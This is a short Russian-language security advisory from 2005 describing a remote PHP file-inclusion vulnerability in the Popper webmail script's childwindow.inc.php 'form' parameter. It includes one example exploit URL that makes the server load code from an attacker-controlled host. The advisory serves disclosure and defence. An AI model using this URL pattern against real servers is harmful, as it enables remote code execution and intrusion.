PHP-инклюдинг в Popper

Дата публикации:08.06.2005
Всего просмотров:3380
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Popper

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный php сценарий на целевой системе.

Уязвимость существует в сценарии 'childwindow.inc.php' из-за недостаточной обработки входных данных в параметре 'form'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный php сценарий на целевой системе. Уязвимость существует, если включена опция 'register_globals' в конфигурационном файле php. Пример:

http://[target]/popper/childwindow.inc. php?form=http://[attacker]/test

URL производителя: www.ractive.ch/popper/

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Popper webmail remote code execution vulnerability